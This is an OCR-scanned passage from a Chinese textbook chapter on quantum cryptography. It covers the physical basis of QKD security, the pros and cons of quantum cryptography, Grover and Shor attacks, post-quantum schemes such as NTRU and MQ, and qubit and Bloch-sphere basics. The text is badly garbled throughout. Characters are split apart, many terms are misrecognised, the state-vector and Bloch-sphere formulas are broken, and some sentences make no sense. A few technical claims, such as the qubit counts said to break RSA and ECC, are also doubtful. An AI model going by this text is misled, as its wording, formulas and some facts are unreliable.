方 和 接收 方 从 一 开始 就 已 经 做 了 身份 认证 的 假定 。 完 成 此 假定 的 处 理 步骤 叫做 前 处 理 。 因 此 ,一 个 从 原理 上 绝对 安全 
的 QKD, 应 包含 前 处 理 、 物 理 部 分 以 及 后 处 理 。 
四 “量子 密 钥 首先 是 指 由 物理 原理 确保 的 安全 性 ,不 是 依赖 于 数学 的 复杂 度 。 量 子 力学 告诉 我 们 : 
。 未 知 的 量子 态 不 可 克隆 。 
。 非 正 交 量子 态 是 不 可 识别 的 。 
。 互 不 对 易 的 力学 量 不 可 以 同时 具有 确定 值 。 比 如 光子 不 同 偏振 (Pauli 算 符 的 x 和 < 分 量 )、 相 位 与 光子 数 , 不 能 
同时 具有 确定 值 。 
。 经 典 图 像 不 能 描述 一 个 量子 过 程 。 
同时 ,狭义 相对 论 告诉 我 们 ,任何 信息 (信号 ) 的 传递 都 不 可 以 超 光 速 。 这 样 以 上 的 定理 或 原理 就 构成 了 量子 密 钥 安 
全 性 的 物理 基础 。 任 何 一 个 窃听 者 ,都 必须 受到 以 上 物理 定理 或 原理 的 制约 。 
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(1) 真正 的 随机 性 。 目 前 物理 学 家 的 共识 是 ,“ 真 随机 性 只 存在 于 纯 量子 过 程 ”。 

(2) 量子 测量 特有 的 “不 确定 关系 ”及 “量子 不 可 克隆 ”。 这 一 特性 使 得 窃听 一 定 会 留 下 
痕迹 (引起 额外 噪声 ) 从 而 被 发 现 , 同 时 , 它 只 存在 于 量子 过 程 之 中 。 

由 此 可 见 ,经 典 密码 学 中 无 法 解决 的 某 些 难题 只 能 在 量子 密码 学 的 框架 下 才能 得 以 根 
本 解决 。 另 一 方面 ,需要 强调 的 是 ,量子 密码 学 不 能 够 完全 替代 经 典 密码 学 。 原 因 是 ,一 个 
完整 的 QKD 系统 包含 了 物理 部 分 、 前 处 理 \ 后 处 理 3 大 部 分 。 其 中 ,前 、 后 处 理 要 依靠 经 典 
密码 学 技术 才能 实现 。 过 去 的 QKD 研究 主要 集中 在 对 物理 部 分 的 探讨 。 近 年 来 ,人 们 逐 
渐 认 识 到 ,要 使 QKD 能 够 最 终 真正 实用 化 ,就 必须 要 密切 结合 经 典 密码 技术 ,从 而 实现 包 
含 了 上 述 3 大 部 分 的 完整 的 QKD。 

量子 密码 学 有 广义 和 狭义 之 分 。 狭 义 量子 密码 学 主要 指 量子 密 钥 分 配 等 基于 量子 技术 
实现 经 典 密码 学 目标 的 结果 ,广义 量子 密码 学 则 是 指 能 统一 刻画 狭义 量子 密码 学 和 经 典 密 
码 学 的 一 个 理论 框架 。 经 典 密码 学 和 一 切 与 量子 性 质 有 关 的 密码 学 结果 可 以 统一 在 “量子 
信息 密码 学 ”框架 下 。 这 里 “量子 信息 ”概念 十 分 重要 。 把 量子 态 视 为 信息 ,对 量子 态 提 出 信 
息 论 问 题 ,是 人 类 在 信息 概念 上 的 巨大 飞跃 ,是 基于 自然 界 基本 定律 对 信息 概念 的 自然 推 
广 ,是 量子 信息 科学 的 基石 。 因 为 经 典 信息 是 量子 信息 的 一 个 子 集 , 在 量子 信息 上 建立 的 密 
码 学 才 是 一 个 自 洽 9 理论 。 经 典 密码 学 和 狭义 量子 密码 学 只 是 作为 量子 信息 密码 学 这 个 普 
遍 理论 的 两 个 退化 形式 而 存在 。 

发 展 量子 信 息 密码 学 的 目的 是 研究 量子 信息 的 密码 编码 和 密码 分 析 问 题 ,探索 希 尔 伯 
特 空间 “量子 信息 密码 学 ”的 理论 体系 ,一 方面 致力 于 对 量子 信息 系统 安全 性 问题 的 解决 ,一 
方面 希望 为 有 限 域 上 传统 的 密码 学 开辟 新 的 道路 。 这 与 应 用 方面 的 理念 完全 不 同 。 想 想 从 
牛顿 力学 到 狭义 相对 论 的 推广 。 虽然 至 今 建 筑 . 水 利 、 机 械 、 航 空 航天 等 仍然 只 是 应 用 牛顿 
力学 ,但 铭刻 在 爱 因 斯 坦 幕 碑 上 的 那个 不 朽 的 公式 在 使 人 类 长 期 受到 毁灭 威胁 的 同时 ,也 给 
人 类 带 来 了 无 限 的 希望 。 这 就 是 理论 的 力量 。 所 以 ,理论 上 做 一 件 事 跟 应 用 是 完全 不 同 的 
出 发 点 ,将 来 的 作用 也 不 一 样 。 

发 展 量子 信息 密码 学 需要 传统 的 密码 学 理论 和 方法 ,也 需要 量子 信息 和 量子 计算 理论 ， 
如 量子 信息 论 和 量子 计算 复杂 性 理论 ,但 是 这 些 可 能 还 是 远 远 不 够 的 。 发 展 量子 信息 密码 
学 必然 涉及 概念 的 创新 ,必须 重新 考察 密码 学 的 理论 基础 ,研究 对 象 和 研究 方法 。 

可 以 这 么 说 ,经 典 密码 与 量子 密码 首先 是 一 个 “十 ”的 关系 ,然后 再 转变 为 *X” 的 关系 ; 
或 者 说 是 先是 黑 盒 互相 调用 的 关系 ,再 逐步 转变 为 白 盒 互相 融合 的 关系 ; 总 之 ,经 典 密码 与 
量子 密码 之 间 是 辩证 统一 的 。 


5.2.2 量子 密码 的 目标 与 将 性 


1. 量子 密码 的 目标 

与 传统 密码 一 样 ,量子 密码 的 目标 也 是 为 了 实现 保密 和 认证 两 大 功能 。 在 保密 方面 , 主 
要 密码 体制 有 : 经 典 密码 算法 十 量子 密 钥 分 配 、 量 子 密码 算法 十 经 典 密 钥 分 配 、 纯 量子 密码 
算法 、 基 于 量子 计算 复杂 性 理论 的 密码 (又 称 为 “后 量子 密码 ”或 “ 抗 量子 计算 机 密码 ”) 等 方 


@ “自治 ?就 是 自身 形成 了 一 个 完备 的 体系 ,自身 不 缺少 什么 ,自身 内 部 一 切 相当 协调 一 致 地 运行 ,不 借助 外 界 的 
一 切 就 能 满足 自身 所 需 的 一 切 。 


式 。 在 认证 方面 ,已 有 研究 成 果 涉 及 量子 身份 认证 、 量 子 消息 确认 、 量 子 签名 .量子 信道 认 
证 、 量 子安 全 协议 等 。 在 量子 保密 体制 和 认证 系统 中 ,量子 密 钥 分 配 是 一 个 重要 课题 。 一 个 
量子 密 钥 分 配方 案 通常 包括 4 个 过 程 : 量子 信号 传输 、 随 机 编码 .秘密 协商 、 保 密 加 强 。 物 
理 实现 上 ,量子 密 钥 分 配 主要 以 3 种 模式 实现 : 基于 单 光子 ( 准 单 光子 ) 信 和 号、 基于 连续 变量 
量子 信号 以 及 基于 纠缠 量子 信号 的 实现 方式 。 

2. 量子 密码 的 特点 

1) 设计 方面 

数学 密码 中 ,协议 或 者 算法 通常 依赖 于 数学 中 的 某 个 难 解 问题 而 设计 ,例如 ,RSA 算法 
利用 大 整数 因 式 分 解 问题 ,椭圆 曲线 密码 算法 利用 椭圆 曲线 的 代数 性 质 。 而 在 量子 密码 中 ， 
协议 或 者 算法 基于 某 个 满足 量子 物理 中 测 不 准 原理 和 不 可 克隆 定理 的 物理 问题 而 设计 , 例 
如 ,BB84 协议 利用 量子 态 的 共 思 性 , EPR 协议 利用 纠缠 态 的 量子 关联 性 ,而 他 们 的 安全 性 
都 依赖 于 测 不 准 原理 。 在 某 种 意义 上 ,可 以 认为 量子 密码 和 数学 密码 都 是 依赖 于 难 解 问题 
来 设计 的 。 只 是 数学 密码 依赖 于 数学 上 的 难 解 问题 ,而 量子 密码 依赖 于 量子 物理 中 的 难 解 
问题 : 测 不 准 原理 和 不 可 克隆 定理 。 

2) 实现 方式 

目前 而 言 ,量子 密码 利用 量子 信号 的 传输 特性 而 不 是 存储 特性 实现 量子 密码 方案 ,而 且 
可 实现 即 插 即 用 ,不 需要 额外 模块 。 而 在 数学 密码 中 ,主要 利用 逻辑 运算 来 实现 ,不 关心 传 
输 中 的 物理 层 问题 。 

3) 安全 性 保障 

量子 密码 利用 量子 信号 对 扰动 的 可 检测 性 和 不 可 克隆 性 或 者 基于 量子 图 灵机 的 计算 复 
杂 性 理论 .或 者 独特 的 量子 物理 原理 来 保证 量子 密码 方案 的 安全 性 。 数 学 密码 通常 是 基于 
Shannon 信息 理论 .或 者 基于 图 灵机 的 计算 复杂 性 理论 来 保证 算法 的 安全 性 。 

4) 量子 密码 所 具有 的 高 度 学 科 交叉 性 

一 个 量子 密码 系统 不 但 与 密码 和 量子 物理 有 关 , 还 与 信息 理论 (包括 经 典 信息 理论 和 量 
子 信息 理论 )`. 相 关 技术 领域 的 学 科 如 光纤 通信 、 光 电子 技术 等 有 关 。 

3. 量子 密码 的 优 缺 点 

1) 量子 密码 的 优势 

(1) 可 检测 性 。 

根据 量子 力学 中 的 测 不 准 原 理 , 一 个 量子 态 一 旦 受到 扰动 ,将 破坏 原来 的 量子 态 ,根据 
这 些 改变 可 以 检测 量子 信号 在 信道 中 传输 时 是 否 受到 扰动 ,这样 使 得 量子 密码 具有 可 检测 
性 ,此 特性 在 传统 密码 中 是 没有 的 , 它 为 量子 密码 方案 的 安全 性 提供 了 一 个 保障 。 

(2) 高 安全 性 。 

已 有 成 果 表明 量子 密码 中 存在 下 面 几 类 安全 性 的 算法 : 理论 /信息 安全 性 ,例如 量子 密 
钥 分 配 协 议 (BB84 协议 ); 物理 安全 性 ,如 美国 西北 大 学 提出 的 数据 加 密 算法 ; 计算 安全 
性 ,例如 上 面 提 到 的 抗 量子 计算 密码 算法 。 研 究 结果 表明 ,不 管 是 哪 一 类 安全 性 ,都 比 传统 
密码 中 相应 算法 的 安全 性 高 。 实 际 上 ,由 于 量子 密码 中 通常 采用 非 正 交 态 作为 密 文 ,与 数学 
密码 算法 相 比 量子 密码 算法 更 难 破 译 。 

(3) 应 用 时 与 实际 系统 的 融合 性 。 

从 当前 的 技术 来 看 ,量子 密码 与 通信 系统 可 实现 即 插 即 用 ,不 需要 独立 的 模块 。 即 在 建 
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立 量子 通信 的 过 程 中 , 若 适 当地 选取 了 信道 中 传输 的 量子 信号 , 即 可 实现 保密 通信 。 因 此 ， 
量子 密码 技术 与 实际 系统 具有 更 好 的 融合 性 。 

2) 量子 密码 的 缺陷 

计算 密码 中 存在 下 面 一 些 问题 : 

(1) 无 条 件 安全 算法 的 “不 安全 性 ”, 这 是 one-time pad 在 实际 应 用 中 遭遇 的 困境 。 

(2) 无 法 断定 所 获得 密 钥 的 安全 性 ! 

(3) 计算 安全 性 ,依赖 于 计算 机 的 计算 能 力 和 难 解 问题 的 破解 。 

(4) 受到 量子 计算 技术 的 威胁 ,例如 量子 因 式 分 解 对 RSA 算法 的 攻击 ,量子 搜索 算法 
对 DES 算法 的 攻击 。 

但 是 ,量子 密码 也 不 能 完美 地 解决 这 些 问 题 , 例 如 ,在 (1) 中 ,由 于 量子 密 钥 分 配 速率 还 
比较 低 ,难以 与 一 次 一 密 很 好 地 融合 。 其 他 问题 也 没有 有 效 的 量子 解决 方案 。 

第 二 个 缺点 是 应 用 上 的 脆弱 性 。 从 应 用 的 角度 来 看 ,目前 的 量子 密码 系统 的 鲁 棒 性 还 
不 是 很 好 ,存在 这 样 或 那样 的 问题 。 如 容易 受到 环境 温度 、 相 位 抖动 等 因素 的 影响 ,虽然 可 
以 采取 一 些 相应 的 补偿 技术 ,但 是 技术 上 仍然 不 成 熟 , 工 程 实践 上 有 待 进一步 发 展 。 在 与 现 
有 通信 系统 共同 使 用 时 ,相互 之 间 的 干扰 也 不 能 避免 ,需要 技术 上 的 解决 方案 。 一 些 核心 技 
术 还 不 成 熟 , 例 如: 量子 中 继 ,高 速 编码 技术 等 。 还 有 ,一 个 量子 密码 系统 的 实际 安全 性 与 
理论 安全 性 还 存在 较 大 的 差异 。 

第 三 个 缺点 是 量子 密码 体系 的 不 完善 性 。 量 子 密码 学 虽然 形成 了 自己 的 内 涵 , 具 备 了 
独立 的 体系 ,但 是 该 体系 还 很 不 完善 ,需要 进一步 加 强 。 例 如 ,密码 的 主要 目的 是 为 信息 交 
换 和 存储 过 程 中 提供 信息 私密 性 保护 和 完整 性 认证 ,但 是 ,目前 量子 密码 主要 集中 在 量子 密 
钥 分 配方 面 ,有 待 扩 展 。 此 外 ,本 地 信息 保护 不 能 直接 利用 量子 密码 方式 ,这 有 赖 于 量子 存 
储 技术 的 发 展 。 


5.2.3 量子 密码 的 安全 性 与 攻击 


量子 计算 机 的 出 现 对 密码 构成 了 严重 的 挑战 。 目 前 ,量子 计算 对 现 有 密码 进行 攻击 的 
方法 主要 有 3 种 。 

1.Grover 算法 0 

在 1996 年 提出 的 一 种 通用 搜索 破译 算法 。 这 个 攻击 方法 可 以 把 现 有 密码 的 密 钥 长 度 
减少 到 原来 的 一 半 。 但 是 , 它 还 不 足以 对 现 有 的 密码 构成 根本 性 的 威胁 ,因为 只 要 把 密 钥 加 
长 一 倍 就 可 以 对 抗 了 。 

2. Shor 算法 2 

它 能 以 多 项 式 时 间 攻 击 所 有 能 够 转换 为 广义 离散 传 里 叶 变换 的 公 钥 密码 ,如 RSA、 
DH 、ElGamal 和 ECC 等 密码 。 理 论 表 明 ,1024qbit 量子 计算 机 可 以 破译 256 位 的 ECC 密 
码 一 一 这 正 是 我 们 二 代 身 份 证 中 的 密码 。2048qbit 量子 计算 机 可 以 破译 1024 位 的 RSA 密 


@ 1996 年 ,IBM,Lov Grover 提出 了 Grover"s Algorithm。 在 N( 一 2") 个 物品 中 ,取出 其 中 一 个 的 计算 量 是 
OCN12) 。( 原 来 是 OON)) 。 
四 量子 传 里 叶 变 换 (Quantum Fourier Transfer, QFT)。 传 统 的 FFT 的 计算 量 是 O(N log> )， 而 QFT 只 要 


O(log”) 。Shor 巧妙 地 把 QFT 与 数论 知识 结合 起 来 ,提出 了 因 式 分 解 , 解 离散 对 数 两 个 问题 的 多 项 式 时 间 算法 。 


码 一 一 银行 和 电子 商务 系统 广泛 应 用 这 种 密码 。 

3. 隐藏 子 群 问题 方法 

它 的 攻击 范围 进一步 扩大 。 所 以 ,一 旦 量子 计算 机 能 够 走向 实用 ,现在 广泛 应 用 的 许多 
公 钥 密码 将 不 再 安全 。 量 子 计 算 机 对 我 们 的 密码 提出 了 严重 的 挑战 。 


5.2.4 抗 量子 密码 技术 


哲学 上 有 一 个 基本 的 观点 ,任何 事物 有 优点 也 必然 有 缺点 。 量 子 计算 机 有 优势 , 它 必 然 
也 有 劣势 。 因 此 ,量子 计算 机 有 擅长 计算 的 问题 ,也 有 它 不 擅长 计算 的 问题 。 我 们 可 以 基于 
量子 计算 机 不 擅长 计算 的 那些 数学 问题 构建 密码 ,就 是 可 以 抵御 量子 计算 机 的 攻击 。 这 样 
的 密码 称 为 抗 量子 计算 的 密码 。 

另外 一 方面 ,量子 计算 机 能 够 攻击 许多 密码 ,但 不 是 量子 计算 机 能 把 所 有 的 密码 都 攻破 
了 ,还 有 一 些 密码 是 量子 计算 机 不 能 攻击 的 。 比 如 背包 密码 ,基于 纠 错 编码 的 密码 等 。 所 有 
量子 计算 机 不 能 攻破 的 密码 都 是 抗 量子 计算 的 密码 , 称 之 为 “ 抗 量子 计算 密码 ”(Post- 
Quantum Cryptography) 。 

目前 抗 量子 计算 的 密码 主要 包括 如 下 几 类 : 

(1) 量子 密码 。 

(2) DNA 密码 。 

(3) 基于 量子 计算 不 擅长 计算 的 那些 数学 问题 所 构建 的 密码 。 

对 于 第 三 类 的 抗 量子 计算 密码 ,目前 主要 的 研究 集中 在 以 下 4 个 方向 。 

方向 一 : 具有 抗 量子 计算 能 力 的 密码 一 一 Merkle 认证 树 签 名 。 它 能 签名 ,但 不 能 
加 密 。 

方向 二 : 是 基于 纠 错 码 的 公 钥 密码 体制 。 它 适合 加 密 ,但 不 适合 签名 。 

方向 三 : 基于 格 的 公 钥 密码 ,其 代表 性 密码 是 NTRU (Number Theory Research 
Unit) 。 它 适合 加 密 ,但 不 适合 签名 。 

方向 四 : MQ 公 钥 密码 (多 变 元 二 次 多 项 式 公 钥 密码 体制 Multivariate Quadratic 
Polynomials in Public Key Cryptosystem) 。 它 适合 智能 卡 等 资源 受 限 领域 应 用 ,而 且 只 能 
签名 ,不 能 加 密 。 

在 这 4 种 密码 中 ,相对 比较 成 熟 的 算 NTRU, 但 是 NTRU 申请 了 专利 ,大 规模 的 应 用 
存在 专利 权 的 问题 。 


5.2.5 量子 密码 研究 与 应 用 的 新 方向 


目前 量子 密码 学 方面 的 理论 工作 主要 是 基于 非 正 交 量子 态 的 县 加 和 混合 的 性 质 来 构造 
算法 ,利用 此 类 量子 态 在 物理 上 的 不 可 区 分 性 保证 算法 的 安全 性 ,实现 经 典 密码 学 目标 。 已 
经 构造 的 算法 包括 密 钥 分 配 、 远 程 掷 币 、 私 钥 加 密 、 公 钥 加 密 、 交 互 式 无 密 钥 传输 、 秘 密 分 享 、 
消息 认证 、 鉴 别 .OT、BC 等 。 

量子 密码 的 前 景 问题 ,可 以 从 理论 层面 和 应 用 层面 来 讨论 。 

理论 层面 ,量子 密码 已 经 形成 了 一 个 独立 的 理论 体系 ,作为 密码 学 的 一 个 分 支 ,量子 密 
码 学 是 否 有 足够 的 生命 力 ? 是 否 可 以 成 为 一 门 像 传统 (数学 ) 密 码 那样 的 学 科 体 系 ?是 否 可 
以 成 为 密码 学 的 主流 方向 (之 一 )? 从 目前 的 情况 来 看 ,与 传统 密码 技术 相 比 在 某 些 方面 具 
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有 较 强 的 优势 (这 是 量子 密码 生存 的 基础 )。 因 此 ,我 们 有 理由 相信 未 来 建立 一 个 完善 的 量 
子 密 码 理论 体系 的 美好 前 景 。 

应 用 层面 ,人 们 在 量子 密 钥 分 配 技术 方面 已 经 看 到 了 些许 希望 ,但 是 ,量子 密 钥 分 配 是 
否 可 以 成 为 信息 安全 领域 的 一 项 核心 技术 或 者 标准 化 技术 ? 除 量子 密 钥 分 配 技术 之 外 的 其 
他 量子 密码 与 量子 保密 通信 技术 是 否 也 有 广泛 的 应 用 前 景 ? 这 些 还 有 待 进一步 的 验证 。 不 
过 ,目前 量子 密码 在 光纤 网 络 . 光 无 线 通信 系统 、 互 联网 .移动 通信 系统 等 方面 都 开始 了 初步 
的 应 用 。 随 着 技术 的 进步 与 发 展 , 相 信 在 应 用 层面 量子 密码 技术 会 受到 越 来 越 多 的 关注 。 


5.3 量子 密码 基础 理论 : 量子 信息 科学 基础 


量子 信息 科学 (Quantum Information Science,QIS) 是 一 门 从 物理 科学 .计算 机 科学 、 数 
学 和 工程 里 抽象 出 来 ,相对 新 而 且 快 速 发 展 的 交叉 科学 技术 ,量子 物理 的 发 展 规律 依赖 信息 
技术 的 获取 、 传 输 和 处 理 的 快速 进展 而 进步 。 理 论 研 究 包 括 大 规模 量子 计算 机 ,如 果 技术 成 
熟 , 可 以 解决 一 些 其 他 的 长 期 研究 的 中 间 问 题 ,例如 ,密码 学 数学 制药。 目前 使 用 不 同 的 
物理 机 制 来 进行 量子 状态 的 操纵 ,如 原子 .分子 .光子 和 电子 与 核子 旋转 , 超 导 电 路 和 振荡 机 
制 , 但 实验 结果 操纵 量子 状态 还 远 远 落后 理论 抽象 。 

QIS 研究 越 来 越 多 地 融合 到 材料 ,设备 等 领域 中 。 一 些 机 制 的 挑战 是 与 现代 的 信息 工 
艺 紧 密 相关 的 ,对 弱电 的 重新 注册 、 并 行 ,容错 结构 应 该 有 通信 和 需求。 我 们 期 望 形成 一 个 逐 
渐 整 合 的 量子 和 传统 机 制 工程 ,并 可 以 保持 自己 的 特色 。 尽 管 QIS 与 国家 安全 和 经 济 竞 争 
息息相关 ,美国 政府 仍然 不 定期 地 鼓励 一 些 年 轻 科 学 家 进入 和 持续 研究 这 个 领域 ,许多 美国 
成 功 的 研究 者 参加 了 “大 脑 沟 通 ”。 


5.3.1 什么 是 量子 


量子 本 身 的 意思 是 指 物质 和 能 量 的 最 小 单位 。 微 观 世 界 中 , 某 些 物理 量 的 变化 是 以 最 
小 的 单位 ( 即 量子 ) 跳 跃 式 进行 的 ,而 不 是 连续 的 。 量 子 最 早出 现在 光量 子 理论 中 ,是 微观 系 
统 中 能 量 的 一 个 力学 单位 。 现 代 物 理 将 在 微观 世界 中 所 有 的 微观 粒子 (如 光子 、 电 子 、 原 子 
等 ) 统 称 为 量子 。 普 朗 克 于 1900 年 在 有 关 黑 体 辐射 问题 研究 中 提出 “物质 辐射 (或 吸收 ) 的 
能 量 只 能 是 某 一 最 小 能 量 单位 的 整数 倍数 "的 假说 , 称 为 量子 假说 。 假 说 的 含义 是 : 对 于 一 
定 频率 y 的 电磁 辐射 ,物体 只 能 以 此 最 小 单位 吸收 或 发 射 它 (由 此 可 见 微观 世界 物质 的 能 量 
是 不 连续 的 )。 换 言 之 ,吸收 或 发 射电 磁 辐 射 只 能 以 “量子 ”方式 进行 ,每 个 “量子 ”的 能 量 为 
se 一 A7, 其 中 必 为 一 个 普 适 常量 。 这 种 吸收 或 发 射电 磁 辐 射 能 量 的 不 连续 性 的 概念 ,在 经 典 
力学 中 是 无 法 理解 的 。 

微观 世界 中 量子 具有 宏观 世界 无 法 解释 的 微观 客体 的 许多 特性 ,这 些 特性 集中 表现 在 
量子 的 状态 属性 上 。 如 量子 态 的 倒 加 性 、 量 子 态 的 纠缠 、 量 子 状态 的 不 可 克隆 、 量 子 的 “ 波 粒 
二 象 性 ”以 及 量子 客体 的 测量 将 导致 量子 状态 “ 波 包 塌 缩 "等 现象 。 这 些 奇异 的 现象 来 自 于 
微观 世界 中 微观 客体 间 存 在 的 相互 干涉 . 即 所 谓 的 量子 相干 特性 。 

利用 微观 粒子 的 量子 态 又 加 及 相干 特性 能 够 实现 未 来 计算 机 超 高 速 并 行 计算 ; 利用 微 
观 粒子 的 量子 态 纠缠 、 量 子 态 不 可 克隆 的 力学 特性 能 够 实现 超 高 速 的 信息 传送 、 实 现 不 可 破 
译 不 可 窃听 的 保密 通信 。 


5.3.2 量子 信息 


利用 微观 粒子 状态 表示 的 信息 就 称 为 量子 信息 。 量 子 信 息 学 是 指 以 量子 力学 基本 原理 
为 基础 、 通 过 量子 系统 的 各 种 相干 特性 (如 量子 并 行 、 量 子 纠缠 和 量子 不 可 克隆 等 ) ,研究 信 
息 存储 、 编 码 、 计 算 和 传输 等 行为 的 理论 体系 。 

量子 信息 的 载体 可 以 是 任意 两 态 的 微观 粒子 系统 。 例 如 光子 具有 两 个 不 同 的 线 偏振 态 
或 椭圆 偏振 态 ; 恒定 磁场 中 原子 核 的 自 旋 ; 具有 二 能 级 的 原子 分 子 或 离子 ; 围绕 单一 原子 
旋转 的 电子 的 两 个 状态 (如 图 5.3 所 示 ) 等 。 这 些微 观 粒子 构成 的 系统 都 是 只 有 量子 力学 才 
能 描述 的 微观 系统 ,传递 和 处 理 载荷 在 它们 之 上 的 信息 必定 具备 量子 特征 的 物理 过 程 。 

在 如 图 5. 3 所 示 的 原子 模型 中 ,具有 两 个 层面 的 电子 既 能 稳定 在 


所 谓 的 “基本 ”(Ground) 状 态 ,又 能 稳定 在 所 谓 的 “激活 ”(Excited) 状 ODS 加 
态 , 分 别 把 这 两 种 状态 称 为 一 个 电子 的 两 个 极 化 状态 ,并 用 状态 0 和 (> 
状态 1 分 别 表示 。 在 这 个 微观 系统 中 ,如 果 将 一 东 具 有 适当 能 量 的 光 人 
以 适当 长 的 时 间 照 射 在 这 个 原子 上 ,就 能 够 将 状态 0 改变 成 状态 1， 
反之 亦 然 。 有 趣 的 现象 是 可 以 通过 减少 光 的 照射 时 间 ,使 这 个 电子 从 ”图 5. 3 电子 自 旋 图 
最 初 状 态 0 向 状态 十 的 改变 过 程 中 定位 在 状态 0 和 1 的 任意 中 间 状 
态 。 利 用 量子 的 某 一 状态 表示 信息 时 ,我 们 就 说 是 信息 量子 化 了 并 称 为 量子 信息 。 

信息 一 旦 量子 化 ,描述 “原子 水 平 上 的 物质 结构 及 其 属性 ”的 量子 力学 特性 便 成 为 量子 
信息 的 物理 基础 。 此 时 由 于 信息 载体 一 一 量子 的 微观 特征 ,量子 化 的 信息 也 变 得 多 姿 多 彩 。 
这 些微 观 特 征 主要 表现 在 : 

(1) 量子 态 相 干 性 一 一 微观 系统 中 量子 间 相互 干涉 的 现象 成 为 量子 信息 诸多 不 可 思议 
特性 的 重要 物理 基础 。 

(2) 量子 态 纠缠 性 一 -N( 大 于 1) 个 量子 在 特定 的 (温度 ,磁场 环境 下 可 以 处 于 较 稳定 
的 量子 纠缠 状态 ,对 其 中 某 个 子 系统 的 局 域 操作 会 影响 到 其 余子 系统 的 状态 。 

(3) 量子 态 丰 加 性 一 一 量子 状态 可 以 释 加 ,因此 量子 信息 也 可 以 释 加 ,所 以 可 以 同时 输 
入 或 操作 N 个 量子 比特 的 释 加 态 。 

(4) 量子 不 可 克隆 定理 一 一 量子 力学 的 线性 特性 确保 对 任意 量子 态 无 法 实现 精确 的 
复制 。 

量子 不 可 克隆 定理 和 测 不 准 原 理 构成 量子 密码 技术 的 物理 基础 。 

利用 量子 信息 实现 通信 的 过 程 是 使 每 一 个 微观 粒子 ,通过 自身 的 物理 特性 携带 经 典 信 
息 0 和 1 的 又 加 信和 号 后 实现 的 数据 传输 的 技术 。 事 实 上 ,经 典 计算 机 也 是 量子 力学 的 产物 ， 
它 的 器 件 也 利用 了 诸如 量子 隧道 现象 等 量子 效应 。 但 仅仅 应 用 量子 器 件 的 信息 技术 ,并 不 
等 于 现在 所 说 的 量子 信息 。 目 前 的 量子 信息 主要 是 基于 量子 力学 的 相干 特征 , 重 构 信息 密 
码 、 信 息 计算 和 信息 通讯 的 基本 原理 。 


5.3.3 量子 比 将 和 市 洛 赫 球 标识 法 


相对 于 经 典 信息 的 基本 存储 单元 比特 (bit) .量子 信息 的 基本 存储 单元 称 为 量子 比特 
(qubit) 。 在 经 典 信 息 处 理 过 程 中 ,记述 经 典 信息 的 二 进 制 存储 单元 比特 由 经 典 状态 (如 电 
压 的 高 低 )1 和 0 表示 。 从 物理 角度 讲 , 比 特 是 个 两 态 系统 , 它 可 以 制备 为 两 个 可 识别 状态 
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中 的 一 个 。 量 子 比特 跟 经 典 比特 最 大 的 不 同 , 就 是 前 者 不 再 仅仅 是 非 0 即 1 的 了 ,而 是 可 能 
同时 处 于 0 态 和 1 态 ( 严 格 地 说 ,其 实 是 处 于 0 态 和 1 态 的 又 加 态 )。 

这 个 看 似 不 合理 甚至 错误 的 结论 其 实 代表 了 微观 世界 的 一 个 根本 性 质 , 而 引起 初次 接 
触 量子 信息 技术 的 人 们 对 此 结论 难以 接受 的 原因 在 于 测量 或 者 说 观测 。 在 宏观 物理 环境 
中 ,一 般 可 以 近似 认为 ,事物 的 物理 性 质 独 立 于 测量 ,或 者 说 是 与 观测 是 无 关 的 。 例 如 一 只 
苹果 ,如 何 确定 它 的 质量 ? 显然 是 使 用 天 平 . 称 等 称 量 工具 测量 一 下 即 可 。 问 题 是 很 少 有 人 
想到 在 测量 的 前 后 ,苹果 的 质量 是 否 会 发 生变 化 ? 而 很 少 有 人 想到 的 原因 ,也 许 是 因为 答案 
是 不 言 而 喻 的 一 一 显然 不 变 。 其 他 的 类 似 的 度量 如 长 度 、 速 度 、 动 量 、 动 能 等 也 是 如 此 ,不 会 
因为 外 部 的 观测 而 发 生 改 变 。 然 而 ,这 只 是 宏观 物理 世界 的 一 个 近似 。 到 了 微观 的 量子 级 
世界 ,这 个 结论 却 发 生 了 很 大 的 变化 。 这 就 是 物理 学 中 著名 的 “ 测 不 准 原理 ”,5. 3. 4 节 将 详 
细 描 述 。 

量子 比特 处 于 0 态 和 1 态 的 释 加 状态 表示 如 下 : 

1) =al|0)+B|1) (5-1) 

此 处 引入 Dirac 符号 |。) ,|。) 是 一 个 矢量 , 称 为 右 矢 。 式 (5-1) 中 的 10》 和 |1? 代 表 一 
个 粒子 的 两 种 可 能 状态 ,例如 ,一 个 电子 的 自 旋 向 上 和 自 旋 向 下 状态 ,光子 的 左旋 、 右 旋 态 ， 
一 个 二 能 级 原子 的 基态 和 激发 态 等 。 

通常 的 ,与 线性 代数 相关 ,约定 对 于 单 量子 比特 来 说 ,有 : 


1 

i 0) = | | (5-2) 
0 
0 

『 夭 过 | | (5-3) 
1 

因此 式 (5-1) 也 可 以 表示 为 

1 办 = a (5-4) 

B 


式 (5-1) 中 的 复 常数 a 和 有 表示 概率 幅 , 其 模 的 平方 表示 经 过 测量 系统 拥 缩 为 |0 时 或 

11) 的 概率 ,满足 : 

lal*+|lBl*=1 (5-5) 
也 就 是 说 ,本 来 1y) 是 处 于 释 加 态 a10) 十 B811) 的 ,经 过 测量 ,以 |al? 的 概率 吉 缩 为 10) 态 ,而 
以 18l? 的 概率 十 缩 为 11) 态 。 

可 见 , 经 典 比特 是 量子 比特 的 特例 。 从 数学 上 讲 ,量子 比特 是 在 定义 内 积 的 二 维 复 矢量 
空间 (Hilbert 空间 ) 中 的 一 个 任意 矢量 ,10) 和 |1) 构 成 这 个 二 维 Hilbert 空间 中 的 正 交 、 归 
一 的 基 矢 。 

图 5.4 表现 的 几何 图 形 对 于 我 们 想象 一 个 复杂 量子 比特 会 有 帮助 。 因 为 |al? 十 |8|?==1， 
可 以 将 等 式 (5-1) 改 写成 如 下 形式 : 


| 内 一 cos 了 人 | 0) ersin | 1》 


这 里 一 x 委 4 委 r,0 委 yp 委 2r,z 一 sinbcosp,y 一 singsinp,z 一 cosg。 显 然 和 yp 在 单位 三 维 球体 
上 定义 了 一 个 点 ,这 个 球体 通常 称 为 布 洛 赫 球 ,如 图 5.4 所 示 。 布 洛 赫 球 提 供 了 非常 直 


观 实用 的 单个 量子 比特 纯 状 态 可 视 化 的 几何 表示 ,我 们 常常 利用 
布 洛 赫 球 作为 测评 量子 计算 和 量子 信息 有 关 新 设想 的 绝 好 平台 。 
表 5.1 概括 了 经 典 比特 与 量子 比特 的 区 别 。 

用 量子 比特 存储 量子 态 表示 信息 是 量子 信息 的 出 发 点 。 量 
子 力学 理论 制导 量子 信息 演绎 的 行为 。 薛 定 齐 方 程 制约 着 量子 
